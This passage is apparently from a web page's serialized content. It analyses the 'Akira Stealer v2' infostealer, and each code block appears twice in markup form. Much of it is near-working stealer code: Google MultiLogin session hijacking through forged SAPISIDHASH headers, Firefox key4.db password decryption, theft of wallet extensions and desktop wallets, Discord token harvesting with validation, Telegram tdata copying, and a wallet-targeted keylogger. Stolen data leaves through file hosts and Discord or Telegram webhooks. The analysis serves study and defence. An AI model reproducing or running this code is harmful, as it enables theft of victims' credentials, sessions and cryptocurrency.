\"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n \"https://accounts.google.com/accounts/multilogin\",\n headers=headers,\n json={\"continue\": \"https://mail.google.com/\"}\n)\nif response.status_code == 200:\n # Victim’s cookies now present in response.cookies\n hijacked_cookies = response.cookies\n",[63,11393,11394,11399,11404,11409,11414,11419,11424,11429,11434,11439,11443,11448,11453,11458,11463,11468,11472,11477,11482],{"__ignoreMap":65},[102,11395,11396],{"class":104,"line":105},[102,11397,11398],{},"# Build SAPISIDHASH header for Google services\n",[102,11400,11401],{"class":104,"line":111},[102,11402,11403],{},"origin = \"https://accounts.google.com\"\n",[102,11405,11406],{"class":104,"line":329},[102,11407,11408],{},"timestamp = int(time.time())\n",[102,11410,11411],{"class":104,"line":346},[102,11412,11413],{},"# Compute SHA1 of \"timestamp origin SAPISID\"\n",[102,11415,11416],{"class":104,"line":650},[102,11417,11418],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[102,11420,11421],{"class":104,"line":656},[102,11422,11423],{},"signature = hashlib.sha1(payload).hexdigest()\n",[102,11425,11426],{"class":104,"line":662},[102,11427,11428],{},"headers = {\n",[102,11430,11431],{"class":104,"line":668},[102,11432,11433],{}," \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[102,11435,11436],{"class":104,"line":674},[102,11437,11438],{}," \"Content-Type\": \"application/json\"\n",[102,11440,11441],{"class":104,"line":680},[102,11442,6410],{},[102,11444,11445],{"class":104,"line":9019},[102,11446,11447],{},"# Replay MultiLogin to fetch valid session cookies\n",[102,11449,11450],{"class":104,"line":9025},[102,11451,11452],{},"response = requests.post(\n",[102,11454,11455],{"class":104,"line":9031},[102,11456,11457],{}," \"https://accounts.google.com/accounts/multilogin\",\n",[102,11459,11460],{"class":104,"line":9037},[102,11461,11462],{}," headers=headers,\n",[102,11464,11465],{"class":104,"line":9043},[102,11466,11467],{}," json={\"continue\": \"https://mail.google.com/\"}\n",[102,11469,11470],{"class":104,"line":9049},[102,11471,9238],{},[102,11473,11474],{"class":104,"line":9055},[102,11475,11476],{},"if response.status_code == 200:\n",[102,11478,11479],{"class":104,"line":9061},[102,11480,11481],{}," # Victim’s cookies now present in response.cookies\n",[102,11483,11484],{"class":104,"line":9067},[102,11485,11486],{}," hijacked_cookies = response.cookies\n",[12,11488,11489],{},"By replaying this request, Akira can impersonate the user’s Gmail, Drive, or any other Google service protected by a valid session—no credentials required. This technique leverages Google’s own token acceptance logic, making it nearly indistinguishable from legitimate client behavior.",[41,11491,11493],{"id":11492},"_77-firefox-decryption","7.7 Firefox Decryption",[12,11495,47],{},[12,11497,11498,11499,11502],{},"Gecko‑based browsers like Firefox encrypt saved credentials and cookies using a master key stored in ",[63,11500,11501],{},"key4.db",". Akira includes a stripped‑down decryption routine mirroring Mozilla’s NSS logic, handling both 3DES and AES‑CBC variants without triggering the master password prompt. Example usage:",[56,11504,11506],{"className":8482,"code":11505,"language":8484,"meta":65,"style":65},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", clear_password)\n",[63,11507,11508,11513,11518,11523,11528,11533,11537,11542,11547,11552,11557,11562,11567,11572,11577,11582,11587,11591],{"__ignoreMap":65},[102,11509,11510],{"class":104,"line":105},[102,11511,11512],{},"# Load global Salt and encrypted item from key4.db\n",[102,11514,11515],{"class":104,"line":111},[102,11516,11517],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[102,11519,11520],{"class":104,"line":329},[102,11521,11522],{},"cursor = db.cursor()\n",[102,11524,11525],{"class":104,"line":346},[102,11526,11527],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\n",[102,11529,11530],{"class":104,"line":650},[102,11531,11532],{},"global_salt, item2 = cursor.fetchone()\n",[102,11534,11535],{"class":104,"line":656},[102,11536,7846],{"emptyLinePlaceholder":2180},[102,11538,11539],{"class":104,"line":662},[102,11540,11541],{},"# Decode DER structure and derive key\n",[102,11543,11544],{"class":104,"line":668},[102,11545,11546],{},"decoded, _ = der_decode(item2)\n",[102,11548,11549],{"class":104,"line":674},[102,11550,11551],{},"entry_salt = decoded[0][1][0].asOctets()\n",[102,11553,11554],{"class":104,"line":680},[102,11555,11556],{},"cipher_text = decoded[1].asOctets()\n",[102,11558,11559],{"class":104,"line":9019},[102,11560,11561],{},"# Derive 3DES key\n",[102,11563,11564],{"class":104,"line":9025},[102,11565,11566],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[102,11568,11569],{"class":104,"line":9031},[102,11570,11571],{},"iv = decoded[0][1][1].asOctets()\n",[102,11573,11574],{"class":104,"line":9037},[102,11575,11576],{},"# Decrypt credentials\n",[102,11578,11579],{"class":104,"line":9043},[102,11580,11581],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[102,11583,11584],{"class":104,"line":9049},[102,11585,11586],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[102,11588,11589],{"class":104,"line":9055},[102,11590,7846],{"emptyLinePlaceholder":2180},[102,11592,11593],{"class":104,"line":9061},[102,11594,11595],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[12,11597,11598,11599,805,11601,6190,11603,11605],{},"With this routine, Akira can transparently dump ",[63,11600,10997],{},[63,11602,11000],{},[63,11604,11003],{}," for each Firefox profile, writing the decrypted output to:",[56,11607,11610],{"className":11608,"code":11609,"language":61},[59],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> History.txt\n",[63,11611,11609],{"__ignoreMap":65},[12,11613,11614],{},"This approach sidesteps user-level master password checks, giving the stealer unfettered access to all stored credentials.*",[12,11616,11617],{},[251,11618,11619],{},"4. File Structure & Naming",[56,11621,11624],{"className":11622,"code":11623,"language":61,"meta":65},[59],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n ├── Passwords\\\n │ ├── Chrome Passwords.txt\n │ ├── Edge Passwords.txt\n │ └── …\n ├── Cookies\\\n │ ├── Chrome Cookies.txt\n │ ├── Edge Cookies.txt\n │ ├── user@example.com Google Session.txt\n │ └── …\n ├── CreditCards\\\n │ ├── Chrome CreditCards.txt\n │ └── …\n ├── History\\\n │ ├── Chrome History.txt\n │ └── …\n ├── Autofill\\\n │ ├── Chrome Autofill.txt\n │ └── …\n └── Wallets\\\n ├── Firefox_Default_profiles.zip\n ├── Firefox_Profile1_profiles.zip\n └── …\n",[63,11625,11623],{"__ignoreMap":65},[1255,11627,11628,11642,11648],{},[1258,11629,11630,11631,11634,11635,11638,11639,6051],{},"Each ",[63,11632,11633],{},".txt"," begins with a consistent header (",[63,11636,11637],{},"\u003C================[Akira Stealer v2]>================>",") and separator line (",[63,11640,11641],{},"====…====",[1258,11643,11644,11645,1014],{},"On‑disk ZIP: ",[63,11646,11647],{},"%TEMP%\\\u003CComputerName>.zip",[1258,11649,11650,11651,1014],{},"C&C filename label: ",[63,11652,11653],{},"Akira-\u003Cusername>.zip",[12,11655,11656],{},[251,11657,11658],{},"5. Exfiltration & Cleanup",[56,11660,11662],{"className":8482,"code":11661,"language":8484,"meta":65,"style":65},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[63,11663,11664,11669,11674,11679,11684],{"__ignoreMap":65},[102,11665,11666],{"class":104,"line":105},[102,11667,11668],{},"url = Webhook.uploadToGofile(zip_path)\n",[102,11670,11671],{"class":104,"line":111},[102,11672,11673],{},"if not url:\n",[102,11675,11676],{"class":104,"line":329},[102,11677,11678],{}," url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[102,11680,11681],{"class":104,"line":346},[102,11682,11683],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[102,11685,11686],{"class":104,"line":650},[102,11687,11688],{},"Utils.clear_client_folder()\n",[1255,11690,11691,11701,11715,11732],{},[1258,11692,11693,11696,11697,11700],{},[251,11694,11695],{},"Primary Channel (GoFile.io):"," The malware first attempts to upload the ZIP archive containing all stolen artifacts to GoFile.io, parsing the JSON response for a ",[63,11698,11699],{},"downloadPage"," URL that grants the attacker direct access to the archive.",[1258,11702,11703,11706,11707,11710,11711,11714],{},[251,11704,11705],{},"Automatic Fallbacks:"," Should the GoFile endpoint fail (network timeout, rate limit, etc.), the code seamlessly falls back to ",[63,11708,11709],{},"file.io",", and if that too returns an empty link, finally to ",[63,11712,11713],{},"oshi.at",". Both alternatives are invoked without raising exceptions, ensuring that one of the three services will always be tried in succession.",[1258,11716,11717,11720,11721,11724,11725,805,11728,11731],{},[251,11718,11719],{},"Webhook Reporting:"," Once a URL (or an empty string on persistent failure) is determined, ",[63,11722,11723],{},"Webhook.sendDataTG(...)"," is called, packaging together the download link, machine identifiers (",[63,11726,11727],{},"chatId",[63,11729,11730],{},"startup"," flag) and all category counts (passwords, cookies, autofills, wallets) into a single Discord or Telegram message.",[1258,11733,11734,11737,11738,11741],{},[251,11735,11736],{},"Immediate Cleanup:"," After reporting, ",[63,11739,11740],{},"Utils.clear_client_folder()"," recursively deletes the entire temporary workspace and the ZIP file itself, leaving no trace of the harvested data or the archive on disk.",[2109,11743,11744,11749],{},[12,11745,11746],{},[251,11747,11748],{},"Failure Resilience:",[1255,11750,11751,11758],{},[1258,11752,11753,11754,11757],{},"All upload routines return ",[63,11755,11756],{},"\"\""," on failure instead of throwing, guaranteeing the code flow continues.",[1258,11759,11760],{},"Even if every service is unreachable, the malware still transmits a webhook report (albeit with a missing link) before erasing local artifacts, minimizing forensic remnants unless the process crashes unexpectedly.",[52,11762],{"className":11763},[4854,4855],[12,11765,11766],{},[251,11767,11768],{},"6. Robustness & Error Handling",[1255,11770,11771,11789,11795,11804],{},[1258,11772,11773,11776,11777,11780,11781,11784,11785,11788],{},[251,11774,11775],{},"Granular Exception Handling:"," Every file system interaction—be it ",[63,11778,11779],{},"shutil.copy",", SQLite queries, or ZIP operations—is wrapped in ",[63,11782,11783],{},"try/except"," blocks. When an error occurs (locked DB, permission denied, malformed record), the exception is caught and logged via ",[63,11786,11787],{},"Akira.logErrorTg()",", and execution continues, isolating the failure to that specific file or module.",[1258,11790,11791,11794],{},[251,11792,11793],{},"Threaded Isolation per Browser:"," The extraction routines for each supported browser run in their own thread. This multi-threaded design ensures that a crash or deadlock in one browser’s extraction (e.g., corrupt profile, missing key) does not halt or delay the analysis of other browsers.",[1258,11796,11797,11800,11801,11803],{},[251,11798,11799],{},"Silent Fallbacks & Defaults:"," Many auxiliary routines, such as uploading to alternate file hosts, checking remote resources, or spawning subprocesses, employ nested ",[63,11802,11783],{}," without surface-level alerts—maximizing stealth. Default values (empty strings, booleans) are chosen to keep the flow uninterrupted and remove obvious error conditions.",[1258,11805,11806,11809,11810,11813,11814,11817],{},[251,11807,11808],{},"Mutex & Startup Guards:"," A named mutex (",[63,11811,11812],{},"1qsMlseJplTlArIF14f",") prevents multiple instances, while registry checks and ",[63,11815,11816],{},"Utils.CreateMutex()"," protect against concurrent runs, providing additional stability during real-world deployment.",[41,11819,11821],{"id":11820},"_78-wallet-and-token-exfiltration","7.8 Wallet and Token Exfiltration",[12,11823,47],{},[12,11825,11826],{},"In this phase, Akira Stealer v2 performs the most comprehensive sweep for cryptocurrency credentials and session tokens, spanning browser extensions, desktop wallets, messaging tokens, and live keylogging. It executes in parallel threads, ensuring no vector is missed. Below is a step-by-step, code-backed deep dive.",[186,11828,11830],{"id":11829},"_781-browser-extension-wallets","7.8.1 Browser Extension Wallets",[12,11832,192],{},[12,11834,11835,11838],{},[251,11836,11837],{},"Targets:"," Over 80 extensions across popular browsers, including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman, and more.",[56,11840,11842],{"className":8482,"code":11841,"language":8484,"meta":65,"style":65},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n [\"MetaMask\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n [\"Phantom\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n [\"TrustWallet\", \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n [\"CoinbaseWallet\", \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n [\"Solflare\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n [\"BinanceChain\", \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n [\"Keplr\", \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n [\"Nami\", \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n [\"Talisman\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n [\"TronLink\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n # ... plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n for ext_name, ext_id in walletsExtensions:\n src = os.path.join(base, ext_id)\n if os.path.isdir(src):\n dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n shutil.copytree(src, dest, dirs_exist_ok=True)\n data.ext_wallets_count += 1\n",[63,11843,11844,11849,11854,11859,11864,11869,11874,11879,11884,11889,11894,11899,11904,11909,11914,11919,11924,11929,11934,11939,11944,11949,11954],{"__ignoreMap":65},[102,11845,11846],{"class":104,"line":105},[102,11847,11848],{},"# Hardcoded list of extension IDs and human-friendly names\n",[102,11850,11851],{"class":104,"line":111},[102,11852,11853],{},"walletsExtensions = [\n",[102,11855,11856],{"class":104,"line":329},[102,11857,11858],{}," [\"MetaMask\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[102,11860,11861],{"class":104,"line":346},[102,11862,11863],{}," [\"Phantom\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[102,11865,11866],{"class":104,"line":650},[102,11867,11868],{}," [\"TrustWallet\", \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[102,11870,11871],{"class":104,"line":656},[102,11872,11873],{}," [\"CoinbaseWallet\", \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[102,11875,11876],{"class":104,"line":662},[102,11877,11878],{}," [\"Solflare\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[102,11880,11881],{"class":104,"line":668},[102,11882,11883],{}," [\"BinanceChain\", \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[102,11885,11886],{"class":104,"line":674},[102,11887,11888],{}," [\"Keplr\", \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[102,11890,11891],{"class":104,"line":680},[102,11892,11893],{}," [\"Nami\", \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[102,11895,11896],{"class":104,"line":9019},[102,11897,11898],{}," [\"Talisman\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[102,11900,11901],{"class":104,"line":9025},[102,11902,11903],{}," [\"TronLink\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[102,11905,11906],{"class":104,"line":9031},[102,11907,11908],{}," # ... plus dozens more mapped in code\n",[102,11910,11911],{"class":104,"line":9037},[102,11912,11913],{},"]\n",[102,11915,11916],{"class":104,"line":9043},[102,11917,11918],{},"# Extraction loop for each browser profile\n",[102,11920,11921],{"class":104,"line":9049},[102,11922,11923],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[102,11925,11926],{"class":104,"line":9055},[102,11927,11928],{}," base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[102,11930,11931],{"class":104,"line":9061},[102,11932,11933],{}," for ext_name, ext_id in walletsExtensions:\n",[102,11935,11936],{"class":104,"line":9067},[102,11937,11938],{}," src = os.path.join(base, ext_id)\n",[102,11940,11941],{"class":104,"line":9073},[102,11942,11943],{}," if os.path.isdir(src):\n",[102,11945,11946],{"class":104,"line":9079},[102,11947,11948],{}," dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n",[102,11950,11951],{"class":104,"line":9085},[102,11952,11953],{}," shutil.copytree(src, dest, dirs_exist_ok=True)\n",[102,11955,11956],{"class":104,"line":9091},[102,11957,11958],{}," data.ext_wallets_count += 1\n",[1255,11960,11961,11967],{},[1258,11962,11963,11966],{},[251,11964,11965],{},"Files copied",": Extension-specific IndexedDB, LevelDB, JSON and config files containing encrypted keys, seed phrases, login credentials.",[1258,11968,11969,1062,11972,805,11975,7885],{},[251,11970,11971],{},"Outcome folder",[63,11973,11974],{},"Wallets/MetaMask_Chrome/",[63,11976,11977],{},"Wallets/Phantom_Edge/",[186,11979,11981],{"id":11980},"_782-desktop-wallet-applications","7.8.2 Desktop Wallet Applications",[12,11983,192],{},[12,11985,11986,11988],{},[251,11987,11837],{}," Major desktop clients such as Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, Coinomi, etc.",[56,11990,11992],{"className":8482,"code":11991,"language":8484,"meta":65,"style":65},"walletsDesktop = [\n [\"Electrum\", os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n [\"Exodus\", os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n [\"Guarda\", os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n [\"Rabby\", os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n [\"Coinomi\", os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n if os.path.isdir(path):\n Utils.TaskKill(name.lower())\n dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n shutil.copytree(path, dest, dirs_exist_ok=True)\n data.desktop_wallets_count += 1\n",[63,11993,11994,11999,12004,12009,12014,12019,12024,12029,12033,12038,12043,12048,12053,12058],{"__ignoreMap":65},[102,11995,11996],{"class":104,"line":105},[102,11997,11998],{},"walletsDesktop = [\n",[102,12000,12001],{"class":104,"line":111},[102,12002,12003],{}," [\"Electrum\", os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[102,12005,12006],{"class":104,"line":329},[102,12007,12008],{}," [\"Exodus\", os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n",[102,12010,12011],{"class":104,"line":346},[102,12012,12013],{}," [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n",[102,12015,12016],{"class":104,"line":650},[102,12017,12018],{}," [\"Guarda\", os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[102,12020,12021],{"class":104,"line":656},[102,12022,12023],{}," [\"Rabby\", os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[102,12025,12026],{"class":104,"line":662},[102,12027,12028],{}," [\"Coinomi\", os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[102,12030,12031],{"class":104,"line":668},[102,12032,11913],{},[102,12034,12035],{"class":104,"line":674},[102,12036,12037],{},"for name, path in walletsDesktop:\n",[102,12039,12040],{"class":104,"line":680},[102,12041,12042],{}," if os.path.isdir(path):\n",[102,12044,12045],{"class":104,"line":9019},[102,12046,12047],{}," Utils.TaskKill(name.lower())\n",[102,12049,12050],{"class":104,"line":9025},[102,12051,12052],{}," dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[102,12054,12055],{"class":104,"line":9031},[102,12056,12057],{}," shutil.copytree(path, dest, dirs_exist_ok=True)\n",[102,12059,12060],{"class":104,"line":9037},[102,12061,12062],{}," data.desktop_wallets_count += 1\n",[1255,12064,12065,12078],{},[1258,12066,12067,12070,12071,805,12074,12077],{},[251,12068,12069],{},"Data stolen",": Keystore files (",[63,12072,12073],{},"*.dat",[63,12075,12076],{},"*.json","), private key exports, wallet configuration and transaction history.",[1258,12079,12080,12083],{},[251,12081,12082],{},"Benefit",": Offline wallet contents usable by the attacker to authorize transactions.",[186,12085,12087],{"id":12086},"_783-discord-token-harvest","7.8.3 Discord Token Harvest",[12,12089,192],{},[12,12091,12092],{},"Discord tokens are authentication artifacts—essentially long-lived bearer tokens—that can grant full access to a user’s account without requiring their credentials or MFA. Akira exploits this by scanning browser and app data folders for tokens stored by various Discord clients, including Discord Stable, Canary, PTB (Public Test Build), and even modified forks like Lightcord.",[12,12094,12095],{},"The technique targets LevelDB files under the application's Local Storage, where authentication tokens often remain in plaintext. Using regular expressions, the malware scans these .log and .ldb files for patterns that match either regular user tokens or MFA-enabled tokens.",[12,12097,12098],{},"To increase reliability and reduce noise, Akira includes a validation step: it sends a test request to Discord’s /users/@me endpoint using each harvested token. Only tokens that successfully authenticate (HTTP 200) are exfiltrated via webhook—typically to a Discord channel under attacker control.",[12,12100,12101],{},"This method allows attackers to hijack Discord accounts in real time, impersonate the victim, scrape DMs and guilds, or deploy further malware through social engineering—all without triggering login alerts.",[56,12103,12105],{"className":8482,"code":12104,"language":8484,"meta":65,"style":65},"import re, requests\npatterns = [\n r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\", # User tokens\n r\"mfa\\.[\\w-]{84,100}\" # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n for file in os.listdir(db_dir):\n if file.endswith(('.log', '.ldb')):\n for line in open(os.path.join(db_dir, file), errors='ignore'):\n for pat in patterns:\n for token in re.findall(pat, line):\n # Verify token\n h = {\"Authorization\": token}\n r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n if r.status_code == 200:\n uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n requests.post(webhook_url, json=payload)\n",[63,12106,12107,12112,12117,12122,12127,12131,12136,12141,12146,12151,12156,12161,12166,12171,12176,12181,12186,12191,12196],{"__ignoreMap":65},[102,12108,12109],{"class":104,"line":105},[102,12110,12111],{},"import re, requests\n",[102,12113,12114],{"class":104,"line":111},[102,12115,12116],{},"patterns = [\n",[102,12118,12119],{"class":104,"line":329},[102,12120,12121],{}," r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\", # User tokens\n",[102,12123,12124],{"class":104,"line":346},[102,12125,12126],{}," r\"mfa\\.[\\w-]{84,100}\" # MFA tokens\n",[102,12128,12129],{"class":104,"line":650},[102,12130,11913],{},[102,12132,12133],{"class":104,"line":656},[102,12134,12135],{},"def harvest_discord(base, webhook_url):\n",[102,12137,12138],{"class":104,"line":662},[102,12139,12140],{}," db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[102,12142,12143],{"class":104,"line":668},[102,12144,12145],{}," for file in os.listdir(db_dir):\n",[102,12147,12148],{"class":104,"line":674},[102,12149,12150],{}," if file.endswith(('.log', '.ldb')):\n",[102,12152,12153],{"class":104,"line":680},[102,12154,12155],{}," for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[102,12157,12158],{"class":104,"line":9019},[102,12159,12160],{}," for pat in patterns:\n",[102,12162,12163],{"class":104,"line":9025},[102,12164,12165],{}," for token in re.findall(pat, line):\n",[102,12167,12168],{"class":104,"line":9031},[102,12169,12170],{}," # Verify token\n",[102,12172,12173],{"class":104,"line":9037},[102,12174,12175],{}," h = {\"Authorization\": token}\n",[102,12177,12178],{"class":104,"line":9043},[102,12179,12180],{}," r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[102,12182,12183],{"class":104,"line":9049},[102,12184,12185],{}," if r.status_code == 200:\n",[102,12187,12188],{"class":104,"line":9055},[102,12189,12190],{}," uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[102,12192,12193],{"class":104,"line":9061},[102,12194,12195],{}," payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[102,12197,12198],{"class":104,"line":9067},[102,12199,12200],{}," requests.post(webhook_url, json=payload)\n",[1255,12202,12203],{},[1258,12204,12205,12208],{},[251,12206,12207],{},"Validation",": Only posts valid tokens, preventing stale JWTs from being sent.",[186,12210,12212],{"id":12211},"_784-telegram-session-files","7.8.4 Telegram Session Files",[12,12214,192],{},[12,12216,12217,12219],{},[251,12218,11837],{}," Telegram Desktop/TData",[56,12221,12223],{"className":8482,"code":12222,"language":8484,"meta":65,"style":65},"def steal_telegram(tdata_path, dest_root):\n if os.path.exists(tdata_path):\n Utils.TaskKill(\"telegram.exe\")\n dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n data.has_telegram = True\n",[63,12224,12225,12230,12235,12240,12245,12250],{"__ignoreMap":65},[102,12226,12227],{"class":104,"line":105},[102,12228,12229],{},"def steal_telegram(tdata_path, dest_root):\n",[102,12231,12232],{"class":104,"line":111},[102,12233,12234],{}," if os.path.exists(tdata_path):\n",[102,12236,12237],{"class":104,"line":329},[102,12238,12239],{}," Utils.TaskKill(\"telegram.exe\")\n",[102,12241,12242],{"class":104,"line":346},[102,12243,12244],{}," dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[102,12246,12247],{"class":104,"line":650},[102,12248,12249],{}," shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n",[102,12251,12252],{"class":104,"line":656},[102,12253,12254],{}," data.has_telegram = True\n",[1255,12256,12257,12270],{},[1258,12258,12259,1062,12262,12265,12266,12269],{},[251,12260,12261],{},"Files",[63,12263,12264],{},"tdata"," folder containing session keys, ",[63,12267,12268],{},"D877F..."," folder with secret/unsecret files.",[1258,12271,12272,12275],{},[251,12273,12274],{},"Use",": Load into attacker’s Telegram client for full account access.",[186,12277,12279],{"id":12278},"_785-live-wallet-keylogging","7.8.5 Live Wallet Keylogging",[12,12281,192],{},[12,12283,12284],{},"Cryptocurrency wallets are prime targets for modern info-stealers. Akira includes a live keylogger tailored specifically to steal wallet credentials such as seed phrases, private keys, and passwords at the moment of entry. Unlike generic keyloggers, this one activates only when a known wallet window is detected, dramatically reducing noise and increasing efficiency.",[12,12286,12287],{},"The module monitors active window titles and compares them against a hardcoded list of popular wallet apps like MetaMask, Phantom, Atomic Wallet, and others. Once a matching window is in focus, it begins recording keystrokes via system-wide keyboard hooks. When the user presses Enter, the module immediately captures the current clipboard contents—knowing that users often copy secrets during wallet setup or login—and sends both the typed input and clipboard data to the attacker's webhook. This approach is extremely effective because it combines two attack vectors:",[1255,12289,12290,12293],{},[1258,12291,12292],{},"Context-aware keylogging, to capture sensitive wallet inputs only when relevant.",[1258,12294,12295],{},"Clipboard hijacking, to extract copied recovery phrases or destination addresses before they’re pasted.",[12,12297,12298],{},"Together, these methods allow attackers to silently compromise wallets in real time, even without browser access or file exfiltration.",[56,12300,12302],{"className":8482,"code":12301,"language":8484,"meta":65,"style":65},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n def __init__(self, wallet_titles):\n self.buf = \"\"\n keyboard.on_release(self.capture)\n self.wallet_titles = wallet_titles\n\n def capture(self, event):\n title = pygetwindow.getActiveWindow().title\n if any(w in title for w in self.wallet_titles):\n if event.name == 'enter':\n data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n send_to_webhook(data)\n self.buf = \"\"\n else:\n self.buf += event.name\n",[63,12303,12304,12309,12313,12318,12323,12328,12333,12338,12342,12347,12352,12357,12362,12367,12372,12377,12382],{"__ignoreMap":65},[102,12305,12306],{"class":104,"line":105},[102,12307,12308],{},"import keyboard, pyperclip\n",[102,12310,12311],{"class":104,"line":111},[102,12312,7846],{"emptyLinePlaceholder":2180},[102,12314,12315],{"class":104,"line":329},[102,12316,12317],{},"class WalletKeylogger:\n",[102,12319,12320],{"class":104,"line":346},[102,12321,12322],{}," def __init__(self, wallet_titles):\n",[102,12324,12325],{"class":104,"line":650},[102,12326,12327],{}," self.buf = \"\"\n",[102,12329,12330],{"class":104,"line":656},[102,12331,12332],{}," keyboard.on_release(self.capture)\n",[102,12334,12335],{"class":104,"line":662},[102,12336,12337],{}," self.wallet_titles = wallet_titles\n",[102,12339,12340],{"class":104,"line":668},[102,12341,7846],{"emptyLinePlaceholder":2180},[102,12343,12344],{"class":104,"line":674},[102,12345,12346],{}," def capture(self, event):\n",[102,12348,12349],{"class":104,"line":680},[102,12350,12351],{}," title = pygetwindow.getActiveWindow().title\n",[102,12353,12354],{"class":104,"line":9019},[102,12355,12356],{}," if any(w in title for w in 